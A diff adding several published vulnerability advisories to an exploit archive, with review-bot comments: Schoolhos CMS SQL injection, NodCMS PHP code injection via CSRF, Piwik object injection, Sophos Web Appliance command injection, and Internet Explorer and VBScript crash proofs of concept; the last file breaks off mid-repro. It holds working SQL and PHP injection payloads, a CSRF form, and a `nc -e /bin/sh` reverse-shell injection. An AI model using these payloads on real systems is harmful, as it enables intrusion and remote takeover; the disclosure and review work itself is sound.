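Review bot: The last line of the new file is a pasted terminal prompt (`[todor@adamantium ~]$ GET ...`), so the `#!/bin/sh` shebang, the `.sh` extension and the executable mode describe a script that this file is not; archiving it as a `.txt` note without the executable bit would match its content. The header lists hardware and firmware versions but never states whether the request was accepted without a logged-in session or the current password, which is the fact an operator needs to judge exposure; a header line such as `# Authentication required: <as tested>` would record it. Because the new password travels in a GET query string, it will presumably also land in proxy and web-server access logs, which deserves a one-line comment for anyone assessing an affected device.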
|
|
@ -1,4 +1,3 @@
|
|||
|
||||
=============================================================================================================
|
||||
|
||||
|
||||
|
|
174
platforms/php/webapps/40719.txt
Executable file
174
platforms/php/webapps/40719.txt
Executable file
|
@ -0,0 +1,174 @@
|
|||
Document Title:
|
||||
===============
|
||||
Schoolhos CMS v2.29 - (kelas) Data Siswa SQL Injection Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1931
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2016-11-07
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1931
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
6.7
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Schoolhos CMS is alternative to developing School Website. It's Free and Open Source under GPL License. Easy to install, user friendly and elegant design.
|
||||
|
||||
(Copy of the Vendor Homepage: http://www.schoolhos.com/ & https://sourceforge.net/projects/schoolhoscms/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a remote sql-injection vulnerability in the official Schoolhos v2_29 content management system.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2016-11-07: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A remote sql injection web vulnerability has been discovered in the official Schoolhos v2_29 content management system.
|
||||
The web vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms.
|
||||
|
||||
The sql injection vulnerability is located in the `kelas` parameter of the `index?p=siswakelas module POST method request.
|
||||
Remote attackers are able to execute own sql commands by usage of an insecure post method request through the vulnerable
|
||||
parameter of the own application. The attack vector of the vulnerability is application-side and the request method to
|
||||
inject is POST. The security vulnerability in the content management system is a classic select remote sql-injection.
|
||||
|
||||
The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.7.
|
||||
Exploitation of the remote sql injection vulnerability requires no user interaction or privileged web-application user account.
|
||||
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] ./SCRIPTPATH/index.php?p=siswakelas
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] kelas
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The remote sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account and without user interaction.
|
||||
For security demonstration or to reproduce the sql-injection web vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
-- PoC Session Logs ---
|
||||
[+] Place: POST > Parameter: kelas
|
||||
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: kelas=1' AND 4945=4945 AND 'SfWY'='SfWY
|
||||
|
||||
Type: UNION query
|
||||
Title: MySQL UNION query (NULL) - 3 columns
|
||||
Payload: kelas=-2062' UNION ALL SELECT NULL,CONCAT(0x71736b6271,0x43746d4846536767524d,0x716b6d6171),NULL#
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL > 5.0.11 AND time-based blind
|
||||
Payload: kelas=1' AND SLEEP(5) AND 'Wqrd'='Wqrd
|
||||
---
|
||||
[21 tables]
|
||||
+-----------------+
|
||||
| sh_agenda |
|
||||
| sh_album |
|
||||
| sh_berita |
|
||||
| sh_buku_tamu |
|
||||
| sh_galeri |
|
||||
| sh_guru_staff |
|
||||
| sh_info_sekolah |
|
||||
| sh_jabatan |
|
||||
| sh_kategori |
|
||||
| sh_kelas |
|
||||
| sh_komentar |
|
||||
| sh_mapel |
|
||||
| sh_materi |
|
||||
| sh_pengaturan |
|
||||
| sh_pengumuman |
|
||||
| sh_psb |
|
||||
| sh_sidebar |
|
||||
| sh_siswa |
|
||||
| sh_statistik |
|
||||
| sh_tema |
|
||||
| sh_users |
|
||||
+-----------------+
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The sql-injection vulnerability in the `kelas` parameter of the `index.php` file POST method request can be patched by usage of a secure
|
||||
prepared statement. Parse the parameter and encode the values to a secure format to prevent further
|
||||
sql-injection attacks. Escape the parameter and disallow usage of special chars.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the remote sql-injection web vulnerability in the schoolhos content management system is estimated as high. (CVSS 6.7)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Lawrence Amer (www.vulnerability-lab.com/show.php?user=Lawrence Amer)
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
|
||||
deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
|
||||
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
|
||||
|
||||
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
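Review bot: "Technical Details" names the module as `index?p=siswakelas` with no `.php` and no closing backtick, while "Vulnerable Module(s)" gives `./SCRIPTPATH/index.php?p=siswakelas`; the two should agree. The "Solution" paragraph lists prepared statements, encoding, escaping and a special-character blocklist as if they were interchangeable; binding `kelas` as a query parameter is the fix and the rest is at most defence in depth, so I would reword it to `Bind kelas as a parameter of a prepared statement; input filtering alone is not a sufficient fix.` The disclosure timeline has only the public-disclosure entry, so a reader cannot tell whether the vendor was notified or a fixed release exists; a line saying so either way would help anyone running this CMS.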
|
||||
|
||||
|
64
platforms/php/webapps/40723.txt
Executable file
64
platforms/php/webapps/40723.txt
Executable file
|
@ -0,0 +1,64 @@
|
|||
<!--
|
||||
Title: NodCMS - PHP Code Execution
|
||||
Application: NodCMS
|
||||
Versions Affected: All Version
|
||||
Vendor URL: http://nodcms.com/
|
||||
Software URL: https://github.com/khodakhah/nodcms/archive/master.zip
|
||||
Discovered by: Ashiyane Digital Security Team
|
||||
Tested on: Windows 10
|
||||
Bugs: PHP Code Execution
|
||||
Date: 13-Sept-2016
|
||||
|
||||
|
||||
Proof of Concept :
|
||||
|
||||
Go to Languages menu , select one of languages (such as english) and
|
||||
from action click on Edit Language(en_lang.php).
|
||||
In opened page can see language keys and change them.
|
||||
Select one them(for example "Get More Information") and enter this one
|
||||
of payloads.
|
||||
|
||||
";exec('calc.exe');echo "1
|
||||
";phpinfo();echo "Code Injected
|
||||
|
||||
Code Executec...
|
||||
Now in "config.php" the payload injected.
|
||||
$lang["Get More Information"] = "";phpinfo();echo "Code Injected";
|
||||
|
||||
Because cmd is vulnerable to csrf can use this exploit:
|
||||
|
||||
-->
|
||||
<form method="post"
|
||||
action="http://localhost/nodcms-master/admin/edit_lang_file/1/en">
|
||||
<input name="data[]" type="text" value='";phpinfo();echo "Code Injected'>
|
||||
<input type="submit" value="Submit">
|
||||
</form>
|
||||
<!--
|
||||
|
||||
HTTP Request
|
||||
|
||||
http://localhost/nodcms-master/admin/edit_lang_file/1/en
|
||||
|
||||
POST /nodcms-master/admin/edit_lang_file/1/en HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101
|
||||
Firefox/49.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://localhost/nodcms-master/admin/edit_lang_file/1/en
|
||||
Cookie: __atuvc=15%7C41;
|
||||
grav-tabs-state={%22tab-content.options.advanced%22:%22data.content%22};
|
||||
ci_session=5563aaffb41e0fdf6a0cd65bc945e8c63053afe2;
|
||||
PHPSESSID=l9pgj92pnfddlt45f6fpf2tce7
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 2601
|
||||
|
||||
POST Content:
|
||||
|
||||
data[]=";exec('calc.exe');echo+"1&data[]=All&data[]=Read+Info&data[]=Contact+us&data[]=Login&data[]=Sign+Up&data[]=Home&data[]=Please+Fill+Required+Fields&data[]=Map&data[]=Contact+form&data[]=Full+Name&data[]=Email+address&data[]=Subject&data[]=Request&data[]=Send+email&data[]=Some+Tips&data[]=This+form+is+just+for+who+is+already+our+website's+member!&data[]=If+you+don't+have+any+account+and+didn't+sign+in+before,+use+the+below+link+before+use+this+form!&data[]=You+can+use+your+email+address+or+username+for+sign.&data[]=Username+or+Email&data[]=Email&data[]=Password&data[]=Keep+me+logged+in&data[]=Sign+in&data[]=I+forgot+My+Password&data[]=Please+enter+a+username+or+email+address.&data[]=Please+enter+your+password.&data[]=Register&data[]=Quick+Registration&data[]=You+can+enter+your+email+address+using+the+box+below,+and+get+the+latest+news!&data[]=Enter+your+email+address&data[]=Register+now&data[]=Please+enter+a+valid+email+address.&data[]=Search&data[]=Comments&data[]=Please+send+us+your+feedback&data[]=Read+More&data[]=Search+result&data[]=loading...&data[]=Username+or+password+not+correct&data[]=Forget+password&data[]=Return+password&data[]=If+you+forgot+your+password,+you+can+enter+the+email+address+you+used+to+register+below.+You'll+receive+an+email+from+us+which+you+can+use+to+retrieve+your+password.&data[]=Submit&data[]=This+email+already+exists,+choose+another+email+address+or+click+on+forget+password.&data[]=We+made+a+new+account+for+you,+for+active+your+it+and+choose+your+password+click+on+this+link&data[]=Your+request+is+not+valid.&data[]=Set+password&data[]=Please+provide+a+password&data[]=Your+password+must+be+at+least+6+characters+long&data[]=Please+enter+the+same+password+as+above&data[]=We+send+you+a+link+to+your+email,+please+check+your+email+inbox+and+spam,+and+flow+that.&data[]=Login+now&data[]=Back+to+home&data[]=Choose+your+new+password&data[]=Insert+your+new+password&data[]=Insert+your+new+password+again&data[]=Confirm+your+account&data[]=Cha
nge+password+confirmation!&data[]=Your+account+is+active+now.&data[]=Password+Reset&data[]=Change+pass&data[]=Log+Out&data[]=Change+password&data[]=Change+Passwrod&data[]=Last+Password&data[]=New+password&data[]=Password+Confirm&data[]=Cancel&data[]=Last+password+not+correct
|
||||
-->
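Review bot: The captured request in the trailing comment still carries the reporter's own cookie values (`ci_session`, `PHPSESSID`, plus an unrelated `grav-tabs-state`); these should be replaced with placeholders such as `ci_session=<redacted>` before the file is archived. The write-up says the payload ends up in "config.php" although the file being edited is `en_lang.php`, and "Because cmd is vulnerable to csrf" presumably means "cms". No fixed version or mitigation is given; the `$lang["Get More Information"] = "...";` line shows the root cause, form input written unescaped into a PHP source file with no anti-CSRF token on the form, and one sentence stating that would make the entry useful to maintainers.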
|
||||
|
||||
|
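--- a/platforms/php/webapps/40724.txt
+++ b/platforms/php/webapps/40724.txt
@@ -0,0 +1,77 @@
+---------------------------------------------------------------
+Piwik <= 2.16.0 (saveLayout) PHP Object Injection Vulnerability
+---------------------------------------------------------------
+
+
+[-] Software Link:
+
+https://piwik.org/
+
+
+[-] Affected Versions:
+
+Version 2.16.0 and prior versions.
+
+
+[-] Vulnerability Description:
+
+The vulnerability can be triggered through the saveLayout() method defined in /plugins/Dashboard/Controller.php:
+
+210. public function saveLayout()
+211. {
+212. $this->checkTokenInUrl();
+213.
+214. $layout = Common::unsanitizeInputValue(Common::getRequestVar('layout'));
+215. $layout = strip_tags($layout);
+216. $idDashboard = Common::getRequestVar('idDashboard', 1, 'int');
+217. $name = Common::getRequestVar('name', '', 'string');
+218.
+219. if (Piwik::isUserIsAnonymous()) {
+220. $session = new SessionNamespace("Dashboard");
+221. $session->dashboardLayout = $layout;
+222. $session->setExpirationSeconds(1800);
+
+User input passed by anonymous users through the "layout" request parameter is being stored into
+a session variable at line 221, and this is possible by invoking an URL like this:
+
+http://[piwik]/index.php?module=Dashboard&action=saveLayout&token_auth=anonymous&layout=[injection]%26%2365536;
+
+Since Piwik is not using "utf8mb4" collations for its database, this can be exploited in combination with a MySQL
+UTF8 truncation issue in order to corrupt the session array, allowing unauthenticated attackers to inject arbitrary
+PHP objects into the application scope and carry out Server-Side Request Forgery (SSRF) attacks, delete arbitrary
+files, execute arbitrary PHP code, and possibly other attacks. Successful exploitation of this vulnerability
+requires Piwik to use the database to store session data (dbtable option) and the application running on
+PHP before version 5.4.45, 5.5.29, or 5.6.13.
+
+
+[-] Solution:
+
+Update to version 2.16.1 or later.
+
+
+[-] Disclosure Timeline:
+
+[08/02/2016] - Vendor notified
+[09/02/2016] - Vendor replied not to be able to reproduce the issue
+[11/02/2016] - Proof of concept tested on demo.piwik.org sent to the vendor
+[11/02/2016] - Vendor response stating the issue will be fixed in 2.16.1 release
+[17/02/2016] - Bug bounty received
+[11/04/2016] - Version 2.16.1 released: http://piwik.org/changelog/piwik-2-16-1/
+[16/06/2016] - CVE number requested
+[07/11/2016] - Public disclosure
+
+
+[-] CVE Reference:
+
+The Common Vulnerabilities and Exposures project (cve.mitre.org)
+has not assigned a CVE identifier for this vulnerability.
+
+
+[-] Credits:
+
+Vulnerability discovered by Egidio Romano.
+
+
+[-] Original Advisory:
+
+http://karmainsecurity.com/KIS-2016-13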
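Review bot: The conditions that decide whether an installation is exposed, session storage in the database (`dbtable`) and PHP older than 5.4.45 / 5.5.29 / 5.6.13, appear only in the last sentence of the description, while "Affected Versions" says just "2.16.0 and prior". I would add a `[-] Preconditions:` block directly under "Affected Versions" repeating those two conditions, since that is what an operator checks first when triaging. The timeline dates read as day/month/year (the sequence only makes sense that way), which is ambiguous next to the ISO dates used elsewhere in the database; `2016-04-11` instead of `[11/04/2016]` would remove the doubt.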
|
129
platforms/php/webapps/40725.txt
Executable file
129
platforms/php/webapps/40725.txt
Executable file
|
@ -0,0 +1,129 @@
|
|||
KL-001-2016-009 : Sophos Web Appliance Remote Code Execution
|
||||
|
||||
Title: Sophos Web Appliance Remote Code Execution
|
||||
Advisory ID: KL-001-2016-009
|
||||
Publication Date: 2016.11.03
|
||||
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt
|
||||
|
||||
|
||||
1. Vulnerability Details
|
||||
|
||||
Affected Vendor: Sophos
|
||||
Affected Product: Web Apppliance
|
||||
Affected Version: v4.2.1.3
|
||||
Platform: Embedded Linux
|
||||
CWE Classification: CWE-78: Improper Neutralization of Special Elements
|
||||
used in an OS Command ('OS Command Injection'),
|
||||
CWE-88: Argument Injection or Modification
|
||||
Impact: Remote Code Execution
|
||||
Attack vector: HTTP
|
||||
|
||||
2. Vulnerability Description
|
||||
|
||||
An authenticated user of any privilege can execute arbitrary
|
||||
system commands as the non-root webserver user.
|
||||
|
||||
3. Technical Description
|
||||
|
||||
Multiple parameters to the web interface are unsafely handled and
|
||||
can be used to run operating system commands, such as:
|
||||
|
||||
POST /index.php?c=logs HTTP/1.1
|
||||
Host: [redacted]
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0)
|
||||
Gecko/20100101 Firefox/46.0
|
||||
Accept: text/javascript, text/html, application/xml, text/xml, */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
DNT: 1
|
||||
X-Requested-With: XMLHttpRequest
|
||||
X-Prototype-Version: 1.6.1
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Content-Length: 305
|
||||
Connection: close
|
||||
|
||||
|
||||
STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&start=&end=&direction=1
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Tue, 10 May 2016 15:35:05 GMT
|
||||
Server: Apache
|
||||
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0,
|
||||
pre-check=0
|
||||
Pragma: no-cache
|
||||
X-Frame-Options: sameorigin
|
||||
X-Content-Type-Options: nosniff
|
||||
Connection: close
|
||||
Content-Type: text/html; charset=utf-8
|
||||
Content-Length: 207
|
||||
|
||||
{"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10
|
||||
4:35
|
||||
PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"}
|
||||
|
||||
--
|
||||
|
||||
The vulnerable parameters are: by, request_id, and txt_filter_domain
|
||||
|
||||
That request launches the following process on the SWA:
|
||||
|
||||
1000 16851 0.0 0.0 2728 1040 ? S 15:43 0:00 sh -c
|
||||
/opt/perl/bin/salp-generate-report.pl --report=Filter --res=-
|
||||
--type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA=='
|
||||
--start='2016/05/10' --end='2016/05/10' --action=''
|
||||
--sid=590fca17b230e8cdba0394cfa28ef2eb
|
||||
|
||||
From the shell launched via netcat:
|
||||
|
||||
id;uname -a;uptime
|
||||
uid=1000(spiderman) gid=1000(spiderman)
|
||||
groups=1000(spiderman),16(cron),44(tproxyd),45(wdx)
|
||||
Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux
|
||||
15:52:34 up 4:26, 0 users, load average: 0.11, 0.12, 0.15
|
||||
|
||||
4. Mitigation and Remediation Recommendation
|
||||
|
||||
The vendor has issued a fix for this vulnerability in Version
|
||||
4.3 of SWA. Release notes available at:
|
||||
|
||||
http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html
|
||||
|
||||
5. Credit
|
||||
|
||||
This vulnerability was discovered by Matt Bergin (@thatguylevel)
|
||||
of KoreLogic, Inc.
|
||||
|
||||
6. Disclosure Timeline
|
||||
|
||||
2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos
|
||||
2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.
|
||||
2016.09.28 - KoreLogic requests status update.
|
||||
2016.09.28 - Sophos informs KoreLogic that an update including a fix
|
||||
for this vulnerability will be available near the end
|
||||
of October.
|
||||
2016.10.13 - Sophos informs KoreLogic that the update was released to a
|
||||
limited customer base and is expected to be distributed
|
||||
at-large over the following week.
|
||||
2016.11.03 - Public disclosure.
|
||||
|
||||
7. Proof of Concept
|
||||
|
||||
See 3. Technical Description.
|
||||
|
||||
|
||||
The contents of this advisory are copyright(c) 2016
|
||||
KoreLogic, Inc. and are licensed under a Creative Commons
|
||||
Attribution Share-Alike 4.0 (United States) License:
|
||||
http://creativecommons.org/licenses/by-sa/4.0/
|
||||
|
||||
KoreLogic, Inc. is a founder-owned and operated company with a
|
||||
proven track record of providing security services to entities
|
||||
ranging from Fortune 500 to small and mid-sized companies. We
|
||||
are a highly skilled team of senior security consultants doing
|
||||
by-hand security assessments for the most important networks in
|
||||
the U.S. and around the world. We are also developers of various
|
||||
tools and resources aimed at helping the security community.
|
||||
https://www.korelogic.com/about-korelogic.html
|
||||
|
||||
Our public vulnerability disclosure policy is available at:
|
||||
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
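Review bot: The request body still shows a full `STYLE=` value and the same string reappears as `--sid=` in the process listing, so it looks like a session identifier from the test appliance; the host is redacted and this value should be as well, e.g. `STYLE=<redacted>`. "Affected Product: Web Apppliance" has a typo. Section 4 gives only the fixed version; for operators who cannot move to 4.3 at once, the process listing already shows what to hunt for, `salp-generate-report.pl` started through `sh -c` with backticks or other shell metacharacters in its `--type` argument, and one sentence saying so would make the advisory usable for detection. The listing also shows `--filter` passed base64-encoded and quoted while `--type` is concatenated raw, which is presumably the root cause and worth stating.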
|
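--- a/platforms/windows/dos/40722.html
+++ b/platforms/windows/dos/40722.html
@@ -0,0 +1,115 @@
+<!--
+Source: http://blog.skylined.nl/20161104001.html
+
+Synopsis
+
+A specially crafted web-page can cause Microsoft Internet Explorer 9 to access data before the start of a memory block. An attack that is able to control what is stored before this memory block may be able to disclose information from memory or execute arbitrary code.
+
+Known affected versions, attack vectors and mitigations
+
+Microsoft Internet Explorer 9
+An attacker would need to get a target user to open a specially crafted web-page. As far as can be determined, disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
+-->
+
+<!DOCTYPE html>
+<!-- This file must be loaded inside an iframe in another web-page to trigger the vulnerability. -->
+<html>
+<head>
+<style>
+oElement1 {
+position: absolute;
+}
+oElement2:after {
+position: relative;
+content: counter(x);
+}
+</style>
+<script>
+onload = function () {
+oElement1 = document.createElement('oElement1');
+document.documentElement.appendChild(oElement1);
+oElement2 = document.createElement('oElement2');
+document.documentElement.appendChild(oElement2);
+};
+</script>
+</head>
+</html>
+
+<!--
+Description
+
+After adding two elements with specific style properties during the onload event handler, MSIE refreshes the layout, at which point the "content" style causes it to update a counter, which triggers a call to CPtsTextParaclient::CountApes, in which the exception happens on x86:
+
+MSHTML!CPtsTextParaclient::CountApes:
+mov edi,edi
+push ebp
+mov ebp,esp
+sub esp,8
+push ebx
+mov ebx,dword ptr [eax+20h]
+push esi
+lea ecx,[eax+24h]
+push edi
+mov dword ptr [ebp-8],ecx
+mov dword ptr [ebp-4],0
+test ebx,ebx
+je MSHTML!CPtsTextParaclient::CountApes+0x1b7
+cmp ebx,dword ptr [ebp-8]
+je MSHTML!CPtsTextParaclient::CountApes+0x1b3
+mov eax,dword ptr [ebx] ds:0023:dcbabbbb=????????
+
+I enabled page-heap to make triggering the issue more reliable and get a better idea of what is going on. To understand how, a bit of background on how page heap works is needed. When you enable full page-heap in an application, every heap allocation will be given its own "page". This page contains a data structure that contains information used by page-heap to store information about the allocation, followed by the allocated memory itself and then some optional padding. This structure is stored at the end of the page, with the user allocation aligned as required (hence the optional padding). This memory page is followed by a reserved page, which causes any out-of-bounds access immediately after the allocation to cause an access violation exception. Full details can be found in the Application Verifier documentation on-line.
+
+As the documentation shows, the 0xdcbabbbb value in ebx that causes the access violation is used by page-heap as the "Prefix end magic": a marker at the end of the structure used by page-heap to store information about the allocation that comes immediately before the actual allocation. From the assembly we can see that ebx was read from eax + 0x20, so it might be interesting to ask page-heap where that points to:
+
+1:020> !heap -p -a @eax
+address 0b00efb4 found in
+_DPH_HEAP_ROOT @ 51000
+in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
+af126e8: b00efd8 24 - b00e000 2000
+71908e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
+77c15ede ntdll!RtlDebugAllocateHeap+0x00000030
+77bda40a ntdll!RtlpAllocateHeap+0x000000c4
+77ba5ae0 ntdll!RtlAllocateHeap+0x0000023a
+683928a3 MSHTML!CGeneratedTreeNode::InitBeginPos+0x00000016
+683926b4 MSHTML!CGeneratedContent::InsertOneNode+0x00000044
+6839264d MSHTML!CGeneratedContent::CreateNode+0x000000b8
+68392be1 MSHTML!CGeneratedContent::CreateContent+0x000000d6
+68392b0b MSHTML!CGeneratedContent::ApplyContentExpressionCore+0x00000109
+681a397c MSHTML!CElement::ComputeFormatsVirtual+0x000021c9
+682e9421 MSHTML!CElement::ComputeFormats+0x000000f1
+<<<snip>>>
+
+This tells us that eax points to 0x0b00efb4, which is 0x24 bytes before the user allocated memory at 0xb00efd8. So eax + 0x20 must point 4 bytes before it and tada: this is where page-heap stores the "Prefix end magic".
+
+It seems that this method is called to operate on an object using a pointer at an offset before the actually allocated memory. This does not make much sense until you've analyzed a lot of MSIE bugs: it's quite common in MSIE for an object to "contain" another object in memory, and for MSIE to add offsets to pointers to find a contained object, or to subtract offsets to find the container of such a contained object. It looks like this is the case here as well.
+
+Looking at the caller, CPtsTextParaclient::GetNumberApeCorners, it appears to loop through some data structures. The call to CPtsTextParaclient::CountApes is made in the third loop.
+
+MSHTML!CPtsTextParaclient::GetNumberApeCorners+0x103
+mov ecx,dword ptr [esi+0Ch]
+mov eax,dword ptr [ecx]
+and eax,1
+lea edx,[ebp+0Ch]
+lea eax,[eax+eax*2]
+push edx
+lea eax,[ecx+eax*8-24h]
+call MSHTML!CPtsTextParaclient::CountApes
+
+This code uses a pointer to a memory structure (esi) to find pointer to a second structure (ecx). It reads a flag in eax and multiplies it by 0x18 (3 x 8: eax+eax*2 and eax*8), then subtracts 0x24. It then adds this to ecx to produce the eax value seen during the crash. Since the flag can be either 0 or 1, the result in eax can be either ecx - 0x24 or ecx. Obviously, in this case it is the former.
+
+It appear that the code is using the flag to determine if ecx is a "stand-alone" object or a "contained" object. The bug is that either the code is using this flag incorrectly (the flag is correct, but does not indicate the object is a "contained" object) or the flag has been set incorrectly (the code is correct, but the flag should not have been set as the object is not "contained" in another object).
+
+Exploitation
+
+Using Heap Feng-Shui, it may be possible to allocated a heap block immediately before the one used in the bug and control its content in order to control the data the code is operating on. Unfortunately, at the time I did not look at what the code did with the data if the access violation could be prevented, so it's not possible for me to say exactly what an attacker might do with this vulnerability. But one can speculate that this might allow an attacker to have the code use some secret value (e.g. a pointer to a function in a modules) in a way that allows him/her to retrieve the value (i.e. information disclosure). It might be possible to have the code modify a value located anywhere in memory, and/or have the code call/jump to a location of an attackers choosing (i.e. arbitrary code execution).
+
+I did not investigate the crash on x64, but I can only imagine the code is the same, but the offsets are different.
+
+Time-line
+
+June 2014: This vulnerability was found through fuzzing.
+August 2014: This vulnerability was submitted to ZDI.
+September 2014: ZDI rejects the submission.
+November 2016: Details of this issue are released.
+-->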
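Review bot: The section header records this new file as "Executable file", and the same is true of platforms/windows/remote/40721.html further down; an HTML proof-of-concept has no reason to carry the executable bit, so both should be committed with mode 100644. Separately, the opening comment gives disabling JavaScript as the only mitigation and the time-line stops at the ZDI rejection, so a reader cannot tell whether a vendor fix exists. I would add a line to the first comment block such as `Fix status: not stated in the source advisory; no vendor bulletin referenced.` so the entry is not mistaken for a patched issue.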
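--- a/platforms/windows/remote/40721.html
+++ b/platforms/windows/remote/40721.html
@@ -0,0 +1,220 @@
+<!--
+Source: http://blog.skylined.nl/20161107001.html
+
+Synopsis
+
+A specially crafted script can cause the VBScript engine to access data before initializing it. An attacker that is able to run such a script in any application that embeds the VBScript engine may be able to control execution flow and execute arbitrary code. This includes all versions of Microsoft Internet Explorer.
+
+Known affected versions, attack vectors and mitigations
+
+vbscript.dll
+The issue affects versions 5.6 through 5.8 and both the 32- and 64-bit vbscript.dll binaries.
+
+Windows Script Host
+VBScript can be executed in the command line using cscript.exe/wscript.exe. An attacker would need to find a script running on a target machine that accepts an attacker supplied regular expression and a string, or be able to execute his/her own script. However, since the later should already provide an attacker with arbitrary code execution, no additional privileges are gained by exploiting this vuln.
+
+Microsoft Internet Explorer
+VBScript can be executed from a web-page; MSIE 8, 9, 10 and 11 were tested and are all affected. MSIE 11 requires a META tag to force it to render the page as an earlier version, as MSIE 11 attempts to deprecate vbscript (but fails, so why bother?). An attacker would need to get a target user to open a specially crafted web-page. Disabling scripting, particularly VBScript, should prevent an attacker from triggering the vulnerable code path. Enabling Enhanced Protected Mode appears to disable VBScript on my systems, but I have been unable to find documentation on-line that confirms this is by design.
+
+Internet Information Server (IIS)
+If Active Server Pages (ASP) are enabled, VBScript can be executed in Active Server Pages. An attacker would need to find an asp page that accepts an attacker supplied regular expression and a string, or be able to inject VBScript into an ASP page in order to trigger the vulnerability.
+Repro
+Below are three repro files that trigger the issue in Windows Script Host (repro.vbs), Microsoft Internet Explorer (repro.html), and Internet Information Server (repro.asp).
+
+Repro.vbs:
+
+Set oRegExp = New RegExp
+oRegExp.Pattern = "A|()*?$"
+oRegExp.Global = True
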